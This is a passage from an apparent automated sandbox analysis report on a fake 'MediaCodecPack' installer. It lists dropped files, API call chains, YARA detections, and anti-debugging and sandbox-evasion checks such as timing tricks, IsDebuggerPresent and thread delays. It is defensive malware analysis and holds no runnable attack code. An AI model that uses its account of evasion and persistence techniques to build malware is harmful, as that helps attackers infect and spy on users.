                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004519BC push ecx; mov dword ptr [esp], eax1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx1_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx1_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
                    Source: mediacodecpack.exe.1.drStatic PE information: section name: .aitt4 entropy: 7.74249878627152
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .aitt4 entropy: 7.74249878627152

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_00B0E8A7
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NF7R8.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-7LIEI.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-R0E3S.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-RNN6Q.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-2R56A.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-F7SVI.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeFile created: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_00B0E8A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00401C49 StartServiceCtrlDispatcherA,2_2_00401C49
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60920C91 rdtsc 2_2_60920C91
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_00B0E9AB
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NF7R8.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-7LIEI.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-R0E3S.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-RNN6Q.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-2R56A.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-F7SVI.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5965
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeAPI coverage: 4.6 %
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 5104Thread sleep count: 80 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 5104Thread sleep time: -160000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2676Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2676Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeThread delayed: delay time: 60000Jump to behavior
                    Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{2
                    Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003350000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3555972784.0000000000838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeAPI call chain: ExitProcess graph end nodegraph_0-6762
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeAPI call chain: ExitProcess graph end nodegraph_2-60348
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_2-60565
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60920C91 rdtsc 2_2_60920C91
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B180FE IsDebuggerPresent,2_2_00B180FE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B1E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,2_2_00B1E6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B05E5E RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,2_2_00B05E5E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B180E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B180E8
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B0E85F cpuid 2_2_00B0E85F
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: GetLocaleInfoA,1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: GetLocaleInfoA,1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004585C8
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0045559C GetUserNameA,1_2_0045559C
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.3557079797.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack.exe PID: 6172, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.3557079797.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack.exe PID: 6172, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,2_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60963143
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,2_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,2_2_6096A38C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,2_2_609254B1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6094B407
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6090F435 sqlite3_bind_parameter_index,2_2_6090F435
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,2_2_609255D4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609255FF sqlite3_bind_text,2_2_609255FF
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,2_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,2_2_6094B54C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60925686
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,2_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,2_2_609256E5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6092562A sqlite3_bind_blob,2_2_6092562A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,2_2_60925655
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6094C64A
